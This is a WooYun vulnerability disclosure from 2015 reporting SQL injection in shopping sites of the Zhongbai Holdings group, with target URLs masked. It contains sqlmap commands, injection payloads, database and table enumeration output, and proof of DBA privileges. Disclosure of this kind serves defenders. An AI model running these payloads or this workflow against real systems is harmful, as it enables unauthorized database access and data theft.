当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0162392

漏洞标题:中百控股集团旗下中百商网SQL注入漏洞打包

相关厂商:中百控股集团股份有限公司

漏洞作者: 逆流冰河

提交时间:2015-12-19 16:34

修复时间:2016-02-04 17:47

公开时间:2016-02-04 17:47

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-19: 细节已通知厂商并且等待厂商处理中
2015-12-23: 厂商已经确认,细节仅向厂商公开
2016-01-02: 细节向核心白帽子及相关领域专家公开
2016-01-12: 细节向普通白帽子公开
2016-01-22: 细节向实习白帽子公开
2016-02-04: 细节向公众公开

简要描述:

中百商网是中百控股集团股份有限公司(简称:中百集团;股票代码:000759)旗下购物网站。中百集团是以连锁超市为 主的一家大型商业集团,国家商务部重点培育的全国20家大型流通企业之一,连续五年蝉联中国企业500强,连续十年进入全国零售连锁经营30强。集团旗下中百仓储、中百超市、中百百货、中百电器四家专业连锁公司现有连锁网点700余家,网点覆盖湖北省及重庆市。先后荣获“中华老字号”、“全国百城万店无假 货示范店”、“中国商业名牌企业”、“全国再就业工程先进单位”、“全国职业道德十佳单位”、“全国万村千乡市场工程优秀试点企业”、“中国证券市场年会 最佳公众形象公司”、“三十年改革开放卓越企业”、“全国五一劳动奖状”等多项殊荣。[1]

详细说明:

0x01
1,主站做的还是不错的,没有找到注入的地方,但是百度搜到了一个地方,看下
sqlmap -u "http://**.**.**.**/gg_com.jsp?bill=42" --batch
2,顿时拨云见日
Parameter: bill (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: bill=42 AND 6100=6100
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: bill=42 AND 1504=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(98)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (1504=1504) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(120)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)
---
web application technology: Tomcat 5.0, JSP, Servlet 2.5
back-end DBMS: Oracle
available databases [8]:
[*] DBAUSERZON100
[*] DBSNMP
[*] OUTLN
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
3,网购物主站的表,尽然这么多个
Database: DBAUSERZON100
[417 tables]
+----------------------------+
| AG_REPORT |
| AREA_SHOP |
| ATTACK_BILL |
| ATTACK_JK |
| BACKVIEW |
| BACKVIEW_DY |
| BALANCEID_LOG |
| BALANCE_AMOUNT |
| BALANCE_BILL |
| BALANCE_INFORM |
| BH_CD |
| BH_COMMOD |
| BH_DZXL |
| BH_GYS_JS |
| BH_GYS_RQ |
| BH_JXC_GYS_DAY |
| BH_JXC_GYS_DAY_HIS |
| BH_JXC_GYS_MON |
| BH_PP |
| BH_STR_COM_HZ |
| BH_STR_DD_COM |
| BH_STR_DD_DOC |
| BH_STR_DJ_COM |
| BH_STR_DJ_DOC |
| BH_STR_RK_COM |
| BH_STR_RK_DOC |
| BH_SUPCONTPAYSTATUS |
| BH_SUPCREATELOG |
| BH_SUPSETCHARGE |
| BH_SUPSETTLEDET |
| BH_SUPSETTLEHEAD |
| BINSTR |
| BINSTRDETAIL |
| BINSTRDETAIL1 |
| BINSTRDETAIL_HIS |
| BINSTRHEAD |
| BINSTRHEAD1 |
| BINSTRHEAD_HIS |
| BORDERDETAIL |
| BORDERHEAD |
| BTB_REPORT |
| BTOB_CX |
| BTOB_CX_DELAY |
| BTOB_CX_DELAY_LOG |
| BTOB_CX_INFO |
| BTOB_CX_TMP |
| BTOB_ZC |
| CCJS_PASS |
| CC_CD |
| CC_COMMOD |
| CC_COMMOD1 |
| CC_DSFY |
| CC_DZXL |
| CC_FACTFILL |
| CC_GLJG |
| CC_GYS_JS |
| CC_GYS_RQ |
| CC_JXC_GYS_DAY |
| CC_JXC_GYS_DAY_HIS |
| CC_JXC_GYS_DAY_TEST |
| CC_JXC_GYS_MON |
| CC_LBFX |
| CC_MON_TMP |
| CC_PP |
| CC_STR_COM_HZ |
| CC_STR_DD_COM |
| CC_STR_DD_COM_SH |
| CC_STR_DD_DOC |
| CC_STR_DD_DOC_SH_PRINT |
| CC_STR_DD_DOC_SH_PRINT_LOG |
| CC_STR_DJ_COM |
| CC_STR_DJ_DOC |
| CC_STR_RK_COM |
| CC_STR_RK_COM_HIS |
| CC_STR_RK_COM_TRUE |
| CC_STR_RK_DOC |
| CC_STR_RK_DOC_HIS |
| CC_STR_RK_DOC_TRUE |
| CC_TMP |
| CC_TMP_KC |
| CC_TO_ZON100 |
| CC_TO_ZON100ERRORS |
| CC_TO_ZON100SENDLOG |
| CLOSE_MRID |
| CMD_LIST |
| COMMOD |
| CONTRACT_STATE |
| CPFLB |
| CPXXB |
| CQ_DZXL |
| CQ_GLJG |
| CQ_GYS_JS |
| CQ_JXC_GYS_DAY |
| CQ_JXC_GYS_DAY_15_25 |
| CQ_JXC_GYS_DAY_HIS |
| CQ_JXC_GYS_MON |
| CQ_JXC_GYS_MON_TMP |
| CQ_PP |
| CQ_STR_COM_HZ |
| CQ_STR_DD_COM |
| CQ_STR_DD_COM1 |
| CQ_STR_DD_DOC |
| CQ_STR_DD_DOC1 |
| CQ_STR_DJ_COM |
| CQ_STR_DJ_DOC |
| CQ_STR_RK_COM |
| CQ_STR_RK_COM1 |
| CQ_STR_RK_COM11 |
| CQ_STR_RK_COM_HIS |
| CQ_STR_RK_DOC |
| CQ_STR_RK_DOC1 |
| CQ_STR_RK_DOC_HIS |
| CS_DAY_TMP |
| CS_DZXL |
| CS_GOODSSTOCK_101 |
| CS_GOODSSTOCK_201 |
| CS_GOODSSTOCK_202 |
| CS_GOODSSTOCK_203 |
| CS_GOODSSTOCK_204 |
| CS_GOODSSTOCK_205 |
| CS_GOODSSTOCK_206 |
| CS_GOODSSTOCK_207 |
| CS_GOODSSTOCK_210 |
| CS_GOODSSTOCK_211 |
| CS_GOODSSTOCK_212 |
| CS_GOODSSTOCK_213 |
| CS_GOODSSTOCK_214 |
| CS_GOODSSTOCK_215 |
| CS_GOODSSTOCK_216 |
| CS_GOODSSTOCK_217 |
| CS_GOODSSTOCK_218 |
| CS_GOODSSTOCK_301 |
| CS_GOODSSTOCK_TMP |
| CS_GYS_RQ |
| CS_JJTZ |
| CS_KC_TMP |
| CS_MON_TMP |
| CS_PP |
| CS_SALEGOODSDAY |
| CS_SALEGOODSDAY_HIS |
| CS_SALEGOODSMONTH |
| CS_SALEGOODSMONTH_EC |
| CX_BINSTRDETAIL |
| CX_BINSTRHEAD |
| CX_BORDERDETAIL |
| CX_BORDERHEAD |
| CX_GOODSSTOCK |
| CX_SALEGOODSDAY |
| CX_SALEGOODSMONTH |
| DATA_CHANNEL |
| DATA_CHANNEL_DOC |
| DATA_CHANNEL_STORE |
| DATA_JC |
| DATA_ZH_CHANNEL |
| DDGZ_STATUS |
| DDGZ_XM |
| DDXM_DETAIL |
| DDZT |
| DD_COM |
| DD_MAIN |
| DEL_BZ |
| DEL_FLAG |
| DI_DOWN_GYS |
| DI_DOWN_GYS_BAK |
| DOWN_GYS |
| FAD_SHOW |
| FBXXB |
| FGS_FY |
| FGS_PLAN |
| FILE_NAME |
| FIN_BILLCHECK |
| FIN_BILLCHECK_B |
| FIN_EC_SETTLEMENT1 |
| FIN_JHMX_SCM |
| FIN_JJC_SCM |
| FIN_JJTZ_SCM |
| FIN_RESERVATION |
| FIN_SUPCHARGE_ID |
| FIN_SUPCHARGE_IH |
| FIN_SUPSETTLE_ID |
| FIN_SUPSETTLE_IE |
| FIN_SUPSETTLE_IH |
| FIN_SUPZK_SCM |
| FUNCEXDW |
| FY_TYPE |
| GC_GYS_JS |
| GC_JXC_GYS_DAY |
| GC_JXC_GYS_DAY_HIS |
| GC_JXC_GYS_MON |
| GC_STR_COM_HZ |
| GC_STR_DD_COM |
| GC_STR_DD_DOC |
| GC_STR_DJ_COM |
| GC_STR_DJ_DOC |
| GC_STR_RK_COM |
| GC_STR_RK_COM_HIS |
| GC_STR_RK_DOC |
| GC_STR_RK_DOC_HIS |
| GENSUPSETTLEERRLOG |
| GENSUPSETTLELOG |
| GGLYXX |
| GOODSBASE |
| GOODS_CLICK |
| GOODS_CODE |
| GOODS_INFO |
| GOODS_INFO_081223 |
| GOODS_INFO_090106CC |
| GOODS_INFO_ALL |
| GOODS_INFO_CC |
| GOODS_INFO_ZBCC |
| GROUP_SORT |
| GUESTBOOK |
| GYSID_BASE |
| GYSOPERATION |
| GYSYJXX |
| GYS_CODE |
| GYS_DAY_DP_PM_GYS |
| GYS_LOGIN |
| GYS_PRINT |
| HFXXB |
| INF_AREA |
| INF_COMPANY |
| INF_DZXL |
| INF_FGS |
| INF_FGS_DJLB |
| INF_FL |
| INF_GOODS_CONFIG |
| INF_GYS |
| INF_GYSXX |
| INF_GYSXX111 |
| INF_JYFS |
| INF_MANACAT |
| INF_MC |
| INF_MRID |
| INF_PARAMENT |
| INF_PP |
| INF_PPGYS_BASE |
| INF_SHOP |
| INF_SHOPAREA |
| INF_SHOPCAT |
| INF_SHOP_LENGTH2 |
| INF_SUPDETAIL |
| INTERNET_RESERVE |
| JDBINSTRDETAIL |
| JDBINSTRDETAIL_HIS |
| JDBINSTRHEAD |
| JDBINSTRHEAD_HIS |
| JDBORDERDETAIL |
| JDBORDERHEAD |
| JD_ANAL |
| JD_CC_GYS |
| JD_CC_GYS_CODE |
| JD_CC_GYS_MC |
| JD_CD |
| JD_COMMOD |
| JD_DZXL |
| JD_GYS_JS |
| JD_GYS_RQ |
| JD_JXC_GYS_DAY |
| JD_JXC_GYS_DAY_15_25 |
| JD_JXC_GYS_DAY_HIS |
| JD_JXC_GYS_MON |
| JD_PP |
| JD_STR_COM_HZ |
| JD_STR_DD_COM |
| JD_STR_DD_DOC |
| JD_STR_DJ_COM |
| JD_STR_DJ_DOC |
| JD_STR_RK_COM |
| JD_STR_RK_DOC |
| JOB_LOG |
| JTJK_HISTORY |
| JTJK_SYJK |
| JTJK_USR |
| JX_RK_MX |
| LC_DELIVER_SKU |
| LC_LIST |
| LC_REC_SKU |
| LIST_DOWN |
| LIST_DOWN_BILL |
| LIST_DOWN_GYS |
| MANAFRAME |
| MA_DJ_DATA_JC |
| MA_SALE_DATA_JC |
| MA_STOCK_DATA_JC |
| MGMT$REORG_OBJECTS |
| MGMT$REORG_SCRIPTS |
| MON_GYSDHL |
| MRID_MJ |
| NCP_SX_PSXX |
| NEWS |
| OPERFUNC |
| OPERSAVE |
| OUTBOXDD |
| PBCATCOL |
| PBCATEDT |
| PBCATFMT |
| PBCATTBL |
| PBCATVLD |
| PICT_JTJK |
| PLAN_TABLE |
| RECEIVE_DATA_LOG |
| REQUESTLIST |
| RE_RECEIPT |
| RE_RECEIPT_1 |
| RE_SALE_STORE |
| RE_SALE_STORE_1 |
| RQ |
| SALE_DAYTOTAL |
| SALE_DAY_DP_TOTAL |
| SALE_DAY_TOTAL |
| SALE_GYSDPMON |
| SALE_MON_DP_TOTAL |
| SALE_MON_TOTAL |
| SALE_MRID |
| SALE_PPSORTDAY |
| SALE_PPSORTMON |
| SALE_SORTDAY |
| SALE_SORTMON |
| SBD_CLASS_MENU |
| SBD_DECLARE_DETAIL |
| SBD_DECLARE_HEAD |
| SBD_DECLARE_PAPER |
| SBD_DECLARE_SHOP |
| SBD_GYS_PRODUCER |
| SBD_MARKING |
| SBD_PAPER |
| SBD_PAPER_MENU |
| SBD_PARPER_URL |
| SBD_SHOP |
| SBD_SYSLOG |
| SENDLOG |
| SMOKE |
| SPSJ_ALL |
| SPSJ_ALL111 |
| SPSJ_CC |
| SPSJ_CPMS |
| SPSJ_JM |
| SPSJ_ZM |
| SPXL |
| STOCK_AVG |
| STOP_SHOP |
| STS_APP |
| SUPCONTNO |
| SX_GHXX |
| SX_GOODS_INFO |
| SX_SALEDAY |
| SX_SALEMON |
| SX_SALE_DP_DAY |
| SX_SALE_DP_MON |
| SYS_FGS |
| SYS_FGS_MENU |
| SYS_GYSZH_MENU |
| SYS_GYSZH_ROLE |
| SYS_GYSZH_SUBZH |
| SYS_GYSZH_SUBZH_ROLE |
| SYS_HANDLE_LOG |
| SYS_MENU |
| SYS_ROLE |
| SYS_ROLE_MENU |
| SYS_TJ_PAGE |
| TBL_TEACHER |
| TEMP_DATA_GYS_STORE |
| TEMP_DATA_STORE |
| TEMP_RK |
| TEMP_RK_10081 |
| TEMP_SUPCHARGE_IH |
| TEST |
| TESTHLRE |
| TEST_GOODS |
| TEST_GYS |
| TMP_CS_MC |
| TMP_FIN_SUPCHARGE_IH |
| TOOLFUNC |
| UPDATE_HISLOG |
| UPDATE_TYPE |
| USERIDS |
| USER_FAVORITE |
| USE_ |
| VER |
| WAIT_CHARG |
| WHZBNEWS |
| WJDC |
| WL_CDGYS |
| WMS_DELIVER |
| WMS_REC |
| WMS_STORE_REC |
| WWW_COUNT |
| XLPP |
| YESTDAY_DATA |
| YJW_MOD_CCMONTH |
| YJW_TMPGOODS |
| ZC_GOODS_INFO |
| ZM_CD |
| ZM_DZXL |
| ZM_GYS |
| ZM_XLPP |
| ZM_XLPP_BACK |
| ZM_YH |
| ZON_BS |
| ZON_COMP_INFO |
| ZON_CONT |
| ZON_CONTTOT_MON |
| ZON_CONT_ABO |
| ZON_CONT_DELAY |
| ZON_CONT_PAU |
| ZON_COUNT_UPDATE_LOG |
| ZON_EMPL |
| ZON_GDGL |
| ZON_LOG |
| ZON_MENU |
| ZON_MENU_FUNC |
| ZON_NBXXFB |
| ZON_ROLE |
| ZON_ROLE_MENU |
| ZON_ROLE_MENU_FUNC |
| ZON_ZFFS |
+----------------------------+
4,涉及的东西太多,我不继续了

漏洞证明:

0x02
1,http://**.**.**.**/goods/compare.do?id=1100172264-1100172364" --batch
2,poc
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1100172264-1100172364) AND 5775=5775 AND (8771=8771
---
[20:52:41] [INFO] the back-end DBMS is MySQL
web application technology: Tomcat 5.0, Servlet 2.5
back-end DBMS: MySQL 5
3,DBA权限
[14:42:19] [INFO] retrieved:
current user is DBA: True
0x03
1,注入信息:
sqlmap -u "http://**.**.**.**/qyhy/template/mb1/cpxi.jsp?id=80&dlid=16148" --batch
2,注入点
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=80' AND 7181=7181 AND 'SgeJ'='SgeJ&dlid=16148
---
[14:22:32] [INFO] the back-end DBMS is Oracle
web application technology: Tomcat 5.0, JSP, Servlet 2.5
back-end DBMS: Oracle
available databases [9]:
[*] DBSNMP
[*] NEWB2C
[*] OUTLN
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WHZBEC
[*] WMSYS
3,具体表信息,只看有数据的吧
Database: NEWB2C
+-------------------------------+---------+
| Table | Entries |
+-------------------------------+---------+
| YJW_FJ2EC_PRICE | 886214 |
| TBL_FJ2EC_MAICHANG_GOOD_STOCK | 309576 |
| TBL_FJ2EC_CHG_PRICE | 211184 |
| TBL_FJ2EC_CHG_PRICE_BAK28 | 119025 |
| TBL_FJ2EC_GOOD_BASE | 104577 |
| TBL_FJ2EC_SALES | 33139 |
| SYN_LOG | 30801 |
| TMP_PRICE_YJW | 10047 |
| TBL_FJ2EC_SUPPLIER | 7384 |
| TBL_FJ2EC_POP_PRICE | 5546 |
| TBL_FJ2EC_DACANG_GOOD_STOCK | 2152 |
| TBL_FJ2EC_ALL_REGION | 807 |
| TBL_FJ2EC_FUJI_REGION | 598 |
| TBL_FJ2EC_SYN_INFO | 57 |
| GOODS_MY | 51 |
| SYN_ERRORS_LOG | 4 |
+-------------------------------+---------+

修复方案:

这个还是小厂商吗?

版权声明:转载请注明来源 逆流冰河@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-12-23 20:08

厂商回复:

CNVD确认所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无